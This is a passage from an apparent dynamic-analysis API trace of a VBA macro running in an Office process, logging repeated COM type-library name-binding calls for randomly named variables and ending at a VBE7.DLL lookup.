pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.233] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.233] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62e1a | out: _Dst=0x67c2d40) returned 0x0 [0069.233] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZoAAcUZw") returned 0x10a54a [0069.233] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_ZoAAcUZw" | out: _Dst="_B_var_ZoAAcUZw") returned 0x0 [0069.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_ZoAAcUZw") returned 16 [0069.233] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.233] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZoAAcUZw", lHashVal=0x10a54a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.233] IUnknown:Release (This=0x665ba50) returned 0xd [0069.233] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.233] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZoAAcUZw", lHashVal=0x10a54a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.233] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.234] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.234] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZoAAcUZw", lHashVal=0x10a54a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.234] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.234] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.234] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZoAAcUZw", lHashVal=0x10a54a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.234] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.234] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.234] IUnknown:Release (This=0x665ba50) returned 0xd [0069.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11c9e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_ZoAAcUZw") returned 16 [0069.234] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZoAAcUZw", lHashVal=0x10a54a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0) returned 0x0 [0069.234] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62e1a | out: _Dst=0x144ec0) returned 0x0 [0069.234] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tDGAAQZU", lHashVal=0x100aff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e46, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tDGAAQZU") returned 9 [0069.234] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tDGAAQZU", lHashVal=0x100aff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e46, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tDGAAQZU") returned 9 [0069.234] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tDGAAQZU", lHashVal=0x100aff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.234] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tDGAAQZU") returned 0x100aff [0069.234] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="tDGAAQZU" | out: _Dst="tDGAAQZU") returned 0x0 [0069.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="tDGAAQZU") returned 9 [0069.234] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.234] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tDGAAQZU", lHashVal=0x100aff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.235] IUnknown:Release (This=0x665ba50) returned 0xd [0069.235] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.235] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tDGAAQZU", lHashVal=0x100aff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.235] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.235] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.235] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tDGAAQZU", lHashVal=0x100aff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.235] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.235] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.235] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tDGAAQZU", lHashVal=0x100aff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.235] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e46, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tDGAAQZU") returned 9 [0069.235] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tDGAAQZU", lHashVal=0x100aff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.235] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.235] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62e46 | out: _Dst=0x67c2d40) returned 0x0 [0069.235] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tDGAAQZU") returned 0x10e2c7 [0069.235] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_tDGAAQZU" | out: _Dst="_B_var_tDGAAQZU") returned 0x0 [0069.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_tDGAAQZU") returned 16 [0069.235] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.235] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tDGAAQZU", lHashVal=0x10e2c7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.235] IUnknown:Release (This=0x665ba50) returned 0xd [0069.235] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.235] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tDGAAQZU", lHashVal=0x10e2c7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.236] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.236] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.236] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tDGAAQZU", lHashVal=0x10e2c7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.236] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.236] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.236] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tDGAAQZU", lHashVal=0x10e2c7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.236] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.236] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.236] IUnknown:Release (This=0x665ba50) returned 0xd [0069.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11cce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_tDGAAQZU") returned 16 [0069.236] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tDGAAQZU", lHashVal=0x10e2c7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.236] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62e46 | out: _Dst=0x144ec0) returned 0x0 [0069.236] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MAAAAAQ_", lHashVal=0x107f9e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e72, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAAAAQ_") returned 9 [0069.236] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MAAAAAQ_", lHashVal=0x107f9e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e72, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAAAAQ_") returned 9 [0069.236] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MAAAAAQ_", lHashVal=0x107f9e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAAAAAQ_") returned 0x107f9e [0069.236] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="MAAAAAQ_" | out: _Dst="MAAAAAQ_") returned 0x0 [0069.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="MAAAAAQ_") returned 9 [0069.236] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.236] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MAAAAAQ_", lHashVal=0x107f9e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.237] IUnknown:Release (This=0x665ba50) returned 0xd [0069.237] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.237] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MAAAAAQ_", lHashVal=0x107f9e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.237] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.237] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.237] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MAAAAAQ_", lHashVal=0x107f9e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.237] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.237] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.237] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MAAAAAQ_", lHashVal=0x107f9e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.237] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e72, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAAAAQ_") returned 9 [0069.237] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MAAAAAQ_", lHashVal=0x107f9e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.237] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.237] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62e72 | out: _Dst=0x67c2d40) returned 0x0 [0069.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MAAAAAQ_") returned 0x105727 [0069.237] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_MAAAAAQ_" | out: _Dst="_B_var_MAAAAAQ_") returned 0x0 [0069.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_MAAAAAQ_") returned 16 [0069.237] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.237] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MAAAAAQ_", lHashVal=0x105727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.237] IUnknown:Release (This=0x665ba50) returned 0xd [0069.237] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.237] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MAAAAAQ_", lHashVal=0x105727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.237] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.237] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.237] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MAAAAAQ_", lHashVal=0x105727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.237] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.237] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.237] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MAAAAAQ_", lHashVal=0x105727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.238] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.238] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.238] IUnknown:Release (This=0x665ba50) returned 0xd [0069.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11cfe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_MAAAAAQ_") returned 16 [0069.238] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MAAAAAQ_", lHashVal=0x105727, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.238] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62e72 | out: _Dst=0x144ec0) returned 0x0 [0069.238] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nXDBQZ_", lHashVal=0x109758, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e9e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nXDBQZ_") returned 8 [0069.238] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nXDBQZ_", lHashVal=0x109758, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e9e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nXDBQZ_") returned 8 [0069.238] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nXDBQZ_", lHashVal=0x109758, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nXDBQZ_") returned 0x109758 [0069.238] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nXDBQZ_" | out: _Dst="nXDBQZ_") returned 0x0 [0069.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nXDBQZ_") returned 8 [0069.238] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.238] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nXDBQZ_", lHashVal=0x109758, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.238] IUnknown:Release (This=0x665ba50) returned 0xd [0069.238] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.238] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nXDBQZ_", lHashVal=0x109758, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.238] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.238] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.238] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nXDBQZ_", lHashVal=0x109758, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.238] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.239] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.239] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nXDBQZ_", lHashVal=0x109758, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.239] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e9e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nXDBQZ_") returned 8 [0069.239] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nXDBQZ_", lHashVal=0x109758, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.239] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.239] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62e9e | out: _Dst=0x67c2d40) returned 0x0 [0069.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nXDBQZ_") returned 0x108b5b [0069.239] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nXDBQZ_" | out: _Dst="_B_var_nXDBQZ_") returned 0x0 [0069.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nXDBQZ_") returned 15 [0069.239] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.239] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nXDBQZ_", lHashVal=0x108b5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.239] IUnknown:Release (This=0x665ba50) returned 0xd [0069.239] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.239] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nXDBQZ_", lHashVal=0x108b5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.239] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.239] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.239] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nXDBQZ_", lHashVal=0x108b5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.239] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.239] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.239] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nXDBQZ_", lHashVal=0x108b5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.239] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.239] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.239] IUnknown:Release (This=0x665ba50) returned 0xd [0069.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11d2e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_nXDBQZ_") returned 15 [0069.239] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nXDBQZ_", lHashVal=0x108b5b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0) returned 0x0 [0069.239] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62e9e | out: _Dst=0x144ec0) returned 0x0 [0069.240] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.240] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.240] IUnknown:Release (This=0x665ba50) returned 0xd [0069.240] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.240] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.240] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.240] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.240] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.240] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.240] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.240] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.240] IUnknown:Release (This=0x665ba50) returned 0xd [0069.240] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, 